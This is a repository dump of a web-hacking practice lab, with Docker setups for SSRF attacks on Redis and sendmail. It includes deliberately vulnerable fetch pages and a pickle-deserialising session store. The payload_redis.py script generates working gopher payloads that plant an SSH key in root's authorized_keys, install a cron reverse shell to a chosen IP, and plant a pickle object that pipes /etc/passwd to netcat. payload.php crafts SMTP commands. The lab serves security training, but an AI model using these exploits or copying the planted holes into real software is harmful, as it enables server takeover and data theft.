├── README.md ├── SSRF_REDIS_LAB ├── centos │ ├── Dockerfile │ ├── start.sh │ └── www │ │ └── index.php ├── docker-compose.yml ├── payload_redis.py ├── pickle-redis │ ├── Dockerfile │ ├── app.py │ ├── requirements.txt │ ├── start.sh │ └── www │ │ ├── app.py │ │ ├── session_redis.py │ │ └── templates │ │ ├── index.html │ │ └── login.html ├── ubuntu │ ├── Dockerfile │ ├── start.sh │ └── www │ │ └── index.php └── www │ ├── img │ └── favicon.ico │ └── index.php └── SSRF_SMTP_LAB ├── Dockerfile ├── payload.php ├── sendmail.mc └── src ├── curl.php ├── index.html └── start.sh /README.md: -------------------------------------------------------------------------------- 1 | # Web-Hacking-Lab 2 | :fire: :fire: Lab To Pratice Web Hacking :smile_cat: :smile_cat: 3 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/centos/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM centos:7 2 | 3 | 4 | RUN yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm -y && \ 5 | yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm -y && \ 6 | yum install yum-utils -y && \ 7 | yum-config-manager --enable remi-php73 -y 8 | 9 | RUN yum install php php-curl wget cronie openssh-server -y && \ 10 | yum groupinstall "Development Tools" -y 11 | 12 | RUN wget http://download.redis.io/releases/redis-5.0.5.tar.gz && \ 13 | tar xzf redis-5.0.5.tar.gz && \ 14 | cd redis-5.0.5 && \ 15 | make && make install 16 | 17 | RUN mkdir /etc/redis && cp /redis-5.0.5/redis.conf /etc/redis 18 | 19 | COPY ./start.sh / 20 | RUN chmod +x /start.sh 21 | ADD ./www /www 22 | WORKDIR /www 23 | 24 | EXPOSE 8080 25 | EXPOSE 22 26 | 27 | ENTRYPOINT ["/start.sh"] 28 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/centos/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | redis-server /etc/redis/redis.conf --daemonize yes 4 | 5 | /usr/sbin/init 6 | 7 | /sbin/crond 8 | 9 | php -S 0.0.0.0:8080 10 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/centos/www/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mfakbar127/Web-Hacking-Lab/3cef98577b8d872b75186870eeeef55ab890ba47/SSRF_REDIS_LAB/centos/www/index.php -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | ubuntu_lab: 5 | build: ./ubuntu 6 | container_name: ubuntu_redis_ssrf 7 | restart: on-failure 8 | ports: 9 | - "1111:8080" 10 | - "10024:22" 11 | volumes: 12 | - "./www:/www" 13 | centos_lab: 14 | build: ./centos 15 | container_name: centos_redis_ssrf 16 | restart: on-failure 17 | privileged: true 18 | ports: 19 | - "2222:8080" 20 | - "10025:22" 21 | volumes: 22 | - "./www:/www" 23 | pickle_redis_lab: 24 | build: ./pickle-redis 25 | container_name: pickle_redis_ssrf 26 | restart: on-failure 27 | ports: 28 | - "3333:3333" 29 | volumes: 30 | - "./www:/www" 31 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/payload_redis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | from __future__ import print_function 3 | 4 | import os 5 | import sys 6 | import base64 7 | import urllib 8 | import pickle 9 | import subprocess 10 | 11 | 12 | def generate_resp(command): 13 | res = "" 14 | 15 | if isinstance(command, list): 16 | pass 17 | else: 18 | command = command.split(" ") 19 | 20 | res += "*{}\n".format(len(command)) 21 | for cmd in command: 22 | res += "${}\n".format(len(cmd)) 23 | res += "{}\n".format(cmd) 24 | 25 | return res 26 | 27 | def get_public_ip(): 28 | 29 | try: 30 | return subprocess.check_output(["curl","-s","ident.me"]) 31 | except: 32 | return None 33 | 34 | def generate_gopher(payload): 35 | 36 | final_payload = "gopher://127.0.0.1:6379/_{}".format(urllib.quote(payload)) 37 | 38 | return final_payload 39 | 40 | def ssh_key_write(ssh_dir="/root/.ssh"): 41 | res = "" 42 | pubkey_path = "/home/{}/.ssh/id_rsa.pub".format(os.getlogin()); 43 | 44 | if(not os.path.exists(pubkey_path)): 45 | print("Please Run : ssh-keygen -t rsa") 46 | exit(1) 47 | 48 | pubkey = "\n\n" + open(pubkey_path,"r").read() 49 | 50 | res += generate_resp('flushall') 51 | # res += generate_resp('set 1 {}'.format(pubkey)) 52 | res += generate_resp("set 1 {DUMMY}".format(DUMMY="A" * len(pubkey))) 53 | res += generate_resp('config set dir {}'.format(ssh_dir)) 54 | res += generate_resp('config set dbfilename authorized_keys') 55 | res += generate_resp('save') 56 | res += generate_resp('quit') 57 | 58 | res = res.replace("A" * len(pubkey),pubkey) 59 | res = res.replace("\n","\r\n") 60 | 61 | print(generate_gopher(res)) 62 | 63 | print("") 64 | print("") 65 | print("====================================================") 66 | print("After payload executed, try ssh root@server_hostname") 67 | print("====================================================") 68 | 69 | 70 | def cron_write(ip, port=8080, os_type="centos"): 71 | 72 | if os_type == "centos": 73 | crontab_path = "/var/spool/cron/" 74 | else: 75 | crontab_path = "/var/spool/cron/crontabs" 76 | 77 | cron_command = "\n\n*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/{ip}/{port} 0>&1'\n\n".format(ip=ip, port=port) 78 | res = "" 79 | 80 | res += generate_resp('flushall') 81 | res += generate_resp("set 1 {DUMMY}".format(DUMMY="A" * len(cron_command))) 82 | res += generate_resp('config set dir {}'.format(crontab_path)) 83 | res += generate_resp('config set dbfilename root') 84 | res += generate_resp('save') 85 | res += generate_resp('quit') 86 | 87 | res = res.replace("\n","\r\n") 88 | res = res.replace("A" * len(cron_command), cron_command) 89 | 90 | print(generate_gopher(res)) 91 | 92 | class PickleExploit(object): 93 | 94 | def __reduce__(self): 95 | ip = "127.0.0.1" 96 | port = "9091" 97 | cmd = 'cat /etc/passwd | nc {} {}'.format(ip, port) 98 | return (os.system, (cmd,)) 99 | 100 | def pickle_payload(key): 101 | res = "" 102 | 103 | payload = pickle.dumps(PickleExploit()) 104 | res += "\r\n" 105 | res += generate_resp("set {} {}".format(key, base64.b64encode(payload))) 106 | 107 | res = res.replace("\n", "\r\n") 108 | 109 | print(generate_gopher(res).replace("gopher","http")) 110 | 111 | 112 | 113 | if len(sys.argv) < 2: 114 | print("cron or ssh or pickle") 115 | sys.exit(0) 116 | 117 | if sys.argv[1] == "cron": 118 | ip = raw_input("Reverse IP > ") or get_public_ip() or "127.0.0.1" 119 | port = raw_input("Port > ") or "8080" 120 | os_type = raw_input("Centos/Ubuntu (Default Centos)") or "centos" 121 | cron_write(ip=ip,port=port) 122 | 123 | if sys.argv[1] == "ssh": 124 | ssh_key_write() 125 | 126 | if sys.argv[1] == "pickle": 127 | key = raw_input("Key name > ") 128 | pickle_payload(key) -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM redis:5.0.5 2 | 3 | ENV DEBIAN_FRONTEND noninteractive 4 | 5 | RUN apt update && apt install python curl netcat -y 6 | RUN curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py && python get-pip.py 7 | 8 | COPY . /app 9 | WORKDIR /app 10 | RUN pip install -r requirements.txt 11 | 12 | COPY ./start.sh / 13 | RUN chmod +x /start.sh 14 | 15 | EXPOSE 3333 16 | 17 | ENTRYPOINT ["/start.sh"] 18 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/app.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mfakbar127/Web-Hacking-Lab/3cef98577b8d872b75186870eeeef55ab890ba47/SSRF_REDIS_LAB/pickle-redis/app.py -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | redis 3 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gosu redis redis-server --daemonize yes 4 | 5 | python /app/www/app.py 6 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/www/app.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from flask import Flask, render_template, request, redirect, url_for, session 4 | import httplib 5 | import urllib 6 | import urlparse 7 | 8 | from session_redis import RedisSessionInterface 9 | 10 | app = Flask(__name__) 11 | app.session_interface = RedisSessionInterface() 12 | 13 | @app.route("/", methods=["GET","POST"]) 14 | def index(): 15 | 16 | result = "" 17 | if not session.get("username"): 18 | return redirect(url_for("login")) 19 | 20 | if request.method == "POST": 21 | url = request.form.get("url") 22 | result = fetch(url) 23 | return render_template("index.html", context = {"result" : result, "username" : session.get("username")}) 24 | 25 | @app.route("/login", methods=["GET","POST"]) 26 | def login(): 27 | 28 | if request.method == "POST": 29 | session["username"] = request.form.get("username", "Guest") 30 | 31 | return redirect(url_for("index")) 32 | 33 | return render_template("login.html") 34 | 35 | @app.route("/logout") 36 | def logout(): 37 | session.pop("username") 38 | 39 | return redirect(url_for("login")) 40 | 41 | def fetch(url): 42 | url = urlparse.urlsplit(url) 43 | # httplib is vulnerable to CRLF Injection 44 | h = httplib.HTTPConnection(url.netloc) 45 | h.request("GET", str(urllib.unquote(url.path))) 46 | response = h.getresponse() 47 | data = response.read() 48 | h.close() 49 | 50 | return data 51 | 52 | if __name__ == '__main__': 53 | app.run(host="0.0.0.0", debug=True, port=3333) -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/www/session_redis.py: -------------------------------------------------------------------------------- 1 | # Server-side Sessions with Redis 2 | # http://flask.pocoo.org/snippets/75/ 3 | import base64 4 | import pickle 5 | from datetime import timedelta 6 | from uuid import uuid4 7 | from redis import Redis 8 | from werkzeug.datastructures import CallbackDict 9 | from flask.sessions import SessionInterface, SessionMixin 10 | 11 | 12 | class RedisSession(CallbackDict, SessionMixin): 13 | def __init__(self, initial=None, sid=None, new=False): 14 | def on_update(self): 15 | self.modified = True 16 | CallbackDict.__init__(self, initial, on_update) 17 | self.sid = sid 18 | self.new = new 19 | self.modified = False 20 | 21 | 22 | class RedisSessionInterface(SessionInterface): 23 | serializer = pickle 24 | session_class = RedisSession 25 | 26 | def __init__(self, redis=None, prefix='session:'): 27 | if redis is None: 28 | redis = Redis() 29 | self.redis = redis 30 | self.prefix = prefix 31 | 32 | def generate_sid(self): 33 | return str(uuid4()) 34 | 35 | def get_redis_expiration_time(self, app, session): 36 | if session.permanent: 37 | return app.permanent_session_lifetime 38 | return timedelta(days=1) 39 | 40 | def open_session(self, app, request): 41 | sid = request.cookies.get(app.session_cookie_name) 42 | if not sid: 43 | sid = self.generate_sid() 44 | return self.session_class(sid=sid, new=True) 45 | val = self.redis.get(self.prefix + sid) 46 | if val is not None: 47 | val = base64.b64decode(val) 48 | data = self.serializer.loads(val) 49 | return self.session_class(data, sid=sid) 50 | return self.session_class(sid=sid, new=True) 51 | 52 | def save_session(self, app, session, response): 53 | domain = self.get_cookie_domain(app) 54 | if not session: 55 | self.redis.delete(self.prefix + session.sid) 56 | if session.modified: 57 | response.delete_cookie(app.session_cookie_name, domain=domain) 58 | return 59 | redis_exp = self.get_redis_expiration_time(app, session) 60 | cookie_exp = self.get_expiration_time(app, session) 61 | val = base64.b64encode(self.serializer.dumps(dict(session))) 62 | self.redis.setex(self.prefix + session.sid, int(redis_exp.total_seconds()), val) 63 | response.set_cookie(app.session_cookie_name, session.sid, expires=cookie_exp, httponly=True, domain=domain) 64 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/www/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Fetch Page 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 |
16 |
17 | 20 |
21 |
22 |
23 | 24 | 25 | 26 | 27 |
28 |
29 |
30 | 31 |
32 | 33 | 34 |
35 |
36 |
37 |
38 | 39 | 40 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/pickle-redis/www/templates/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Login Page 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 |
16 |
17 | 20 |
21 |
22 |
23 | 24 | 25 | 26 | 27 |
28 |
29 |
30 | 31 |
32 |
33 |
34 | 35 | 36 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/ubuntu/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update 4 | 5 | RUN apt install -y locales 6 | RUN locale-gen en_US.UTF-8 7 | ENV LANG en_US.UTF-8 8 | ENV LANGUAGE en_US:en 9 | ENV LC_ALL en_US.UTF-8 10 | ENV DEBIAN_FRONTEND noninteractive 11 | 12 | RUN apt install -y php php-curl build-essential wget openssh-server cron rsyslog 13 | 14 | RUN wget -c http://download.redis.io/redis-stable.tar.gz && \ 15 | tar -xvzf redis-stable.tar.gz && \ 16 | cd redis-stable && \ 17 | make && \ 18 | make install 19 | 20 | RUN mkdir /etc/redis && cp /redis-stable/redis.conf /etc/redis 21 | 22 | COPY ./start.sh / 23 | RUN chmod +x /start.sh 24 | 25 | ADD ./www /www 26 | WORKDIR /www 27 | 28 | EXPOSE 8080 29 | EXPOSE 22 30 | 31 | ENTRYPOINT ["/start.sh"] 32 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/ubuntu/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | service cron start 4 | service rsyslog start 5 | 6 | redis-server /etc/redis/redis.conf --daemonize yes 7 | 8 | php -S 0.0.0.0:8080 9 | -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/ubuntu/www/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mfakbar127/Web-Hacking-Lab/3cef98577b8d872b75186870eeeef55ab890ba47/SSRF_REDIS_LAB/ubuntu/www/index.php -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/www/img/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mfakbar127/Web-Hacking-Lab/3cef98577b8d872b75186870eeeef55ab890ba47/SSRF_REDIS_LAB/www/img/favicon.ico -------------------------------------------------------------------------------- /SSRF_REDIS_LAB/www/index.php: -------------------------------------------------------------------------------- 1 | 20 | 21 | 22 | 23 | 24 | Fetch Page 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
35 |
36 |
37 | 40 |
41 |
42 |
43 | 44 | 45 | 46 | 47 |
48 |
49 |
50 | 51 |
52 | 53 | 54 |
55 |
56 |
57 |
58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /SSRF_SMTP_LAB/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | MAINTAINER Ilya Isaev "me@ilyaisaev.com" 4 | 5 | WORKDIR /etc/mail 6 | 7 | RUN apt-get update 8 | 9 | RUN apt install -y locales 10 | RUN locale-gen en_US.UTF-8 11 | ENV LANG en_US.UTF-8 12 | ENV LANGUAGE en_US:en 13 | ENV LC_ALL en_US.UTF-8 14 | ENV DEBIAN_FRONTEND noninteractive 15 | 16 | 17 | RUN set -e && apt-get install -y sendmail 18 | 19 | RUN apt install -y apache2 php libapache2-mod-php php-curl 20 | 21 | # PHP 22 | COPY src/curl.php /var/www/html 23 | COPY src/index.html /var/www/html 24 | 25 | RUN chmod -R 555 /var/www/html/ 26 | 27 | # Sendmail 28 | COPY sendmail.mc /etc/mail/sendmail.mc 29 | RUN m4 sendmail.mc > sendmail.cf && \ 30 | echo "Connect:172 RELAY" >> access && \ 31 | echo "Connect:10 RELAY" >> access && \ 32 | make 33 | 34 | EXPOSE 25 35 | EXPOSE 80 36 | 37 | COPY src/start.sh /start.sh 38 | RUN chmod 555 /start.sh 39 | 40 | ENTRYPOINT [ "/start.sh" ] 41 | -------------------------------------------------------------------------------- /SSRF_SMTP_LAB/payload.php: -------------------------------------------------------------------------------- 1 | ', 5 | 'RCPT TO: ', 6 | 'DATA', 7 | 'Subject: SSRF HERE', 8 | 'SSRF AND SMTP', 9 | '.' 10 | ); 11 | $payload = implode('%0A', $commands); 12 | echo 'gopher://127.0.0.1:25/_' . $payload; 13 | ?> 14 | -------------------------------------------------------------------------------- /SSRF_SMTP_LAB/sendmail.mc: -------------------------------------------------------------------------------- 1 | divert(-1)dnl 2 | #----------------------------------------------------------------------------- 3 | # $Sendmail: debproto.mc,v 8.15.2 2015-12-10 18:02:49 cowboy Exp $ 4 | # 5 | # Copyright (c) 1998-2010 Richard Nelson. All Rights Reserved. 6 | # 7 | # cf/debian/sendmail.mc. Generated from sendmail.mc.in by configure. 8 | # 9 | # sendmail.mc prototype config file for building Sendmail 8.15.2 10 | # 11 | # Note: the .in file supports 8.7.6 - 9.0.0, but the generated 12 | # file is customized to the version noted above. 13 | # 14 | # This file is used to configure Sendmail for use with Debian systems. 15 | # 16 | # If you modify this file, you will have to regenerate /etc/mail/sendmail.cf 17 | # by running this file through the m4 preprocessor via one of the following: 18 | # * make (or make -C /etc/mail) 19 | # * sendmailconfig 20 | # * m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf 21 | # The first two options are preferred as they will also update other files 22 | # that depend upon the contents of this file. 23 | # 24 | # The best documentation for this .mc file is: 25 | # /usr/share/doc/sendmail-doc/cf.README.gz 26 | # 27 | #----------------------------------------------------------------------------- 28 | divert(0)dnl 29 | # 30 | # Copyright (c) 1998-2005 Richard Nelson. All Rights Reserved. 31 | # 32 | # This file is used to configure Sendmail for use with Debian systems. 33 | # 34 | define(`_USE_ETC_MAIL_')dnl 35 | include(`/usr/share/sendmail/cf/m4/cf.m4')dnl 36 | VERSIONID(`$Id: sendmail.mc, v 8.15.2-3 2015-12-10 18:02:49 cowboy Exp $') 37 | OSTYPE(`debian')dnl 38 | DOMAIN(`debian-mta')dnl 39 | dnl # Items controlled by /etc/mail/sendmail.conf - DO NOT TOUCH HERE 40 | undefine(`confHOST_STATUS_DIRECTORY')dnl #DAEMON_HOSTSTATS= 41 | dnl # Items controlled by /etc/mail/sendmail.conf - DO NOT TOUCH HERE 42 | dnl # 43 | dnl # General defines 44 | dnl # 45 | dnl # SAFE_FILE_ENV: [undefined] If set, sendmail will do a chroot() 46 | dnl # into this directory before writing files. 47 | dnl # If *all* your user accounts are under /home then use that 48 | dnl # instead - it will prevent any writes outside of /home ! 49 | dnl # define(`confSAFE_FILE_ENV', `')dnl 50 | dnl # 51 | dnl # Daemon options - restrict to servicing LOCALHOST ONLY !!! 52 | dnl # Remove `, Addr=' clauses to receive from any interface 53 | dnl # If you want to support IPv6, switch the commented/uncommentd lines 54 | dnl # 55 | FEATURE(`no_default_msa')dnl 56 | dnl DAEMON_OPTIONS(`Family=inet6, Name=MTA-v6, Port=smtp, Addr=::1')dnl 57 | DAEMON_OPTIONS(`Family=inet, Name=MTA-v4, Port=smtp')dnl 58 | dnl DAEMON_OPTIONS(`Family=inet6, Name=MSP-v6, Port=submission, M=Ea, Addr=::1')dnl 59 | DAEMON_OPTIONS(`Family=inet, Name=MSP-v4, Port=submission, M=Ea')dnl 60 | dnl # 61 | dnl # Be somewhat anal in what we allow 62 | define(`confPRIVACY_FLAGS',dnl 63 | `needmailhelo,needexpnhelo,needvrfyhelo,restrictqrun,restrictexpand,nobodyreturn,authwarnings')dnl 64 | dnl # 65 | dnl # Define connection throttling and window length 66 | define(`confCONNECTION_RATE_THROTTLE', `15')dnl 67 | define(`confCONNECTION_RATE_WINDOW_SIZE',`10m')dnl 68 | dnl # 69 | dnl # Features 70 | dnl # 71 | dnl # use /etc/mail/local-host-names 72 | FEATURE(`use_cw_file')dnl 73 | dnl # 74 | dnl # The access db is the basis for most of sendmail's checking 75 | FEATURE(`access_db', , `skip')dnl 76 | dnl # 77 | dnl # The greet_pause feature stops some automail bots - but check the 78 | dnl # provided access db for details on excluding localhosts... 79 | FEATURE(`greet_pause', `1000')dnl 1 seconds 80 | dnl # 81 | dnl # Delay_checks allows sender<->recipient checking 82 | FEATURE(`delay_checks', `friend', `n')dnl 83 | dnl # 84 | dnl # If we get too many bad recipients, slow things down... 85 | define(`confBAD_RCPT_THROTTLE',`3')dnl 86 | dnl # 87 | dnl # Stop connections that overflow our concurrent and time connection rates 88 | FEATURE(`conncontrol', `nodelay', `terminate')dnl 89 | FEATURE(`ratecontrol', `nodelay', `terminate')dnl 90 | dnl # 91 | dnl # If you're on a dialup link, you should enable this - so sendmail 92 | dnl # will not bring up the link (it will queue mail for later) 93 | dnl define(`confCON_EXPENSIVE',`True')dnl 94 | dnl # 95 | dnl # Dialup/LAN connection overrides 96 | dnl # 97 | include(`/etc/mail/m4/dialup.m4')dnl 98 | include(`/etc/mail/m4/provider.m4')dnl 99 | dnl # 100 | dnl # Default Mailer setup 101 | MAILER_DEFINITIONS 102 | MAILER(`local')dnl 103 | MAILER(`smtp')dnl 104 | 105 | -------------------------------------------------------------------------------- /SSRF_SMTP_LAB/src/curl.php: -------------------------------------------------------------------------------- 1 | " . $data . ""; 16 | } 17 | curl_close ($curl); 18 | ?> 19 | -------------------------------------------------------------------------------- /SSRF_SMTP_LAB/src/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Fetch Page 5 | 6 | 7 | 8 |
9 | 10 | 11 |
12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /SSRF_SMTP_LAB/src/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | service apache2 start 3 | /usr/lib/sendmail -bD -X /proc/self/fd/1 4 | --------------------------------------------------------------------------------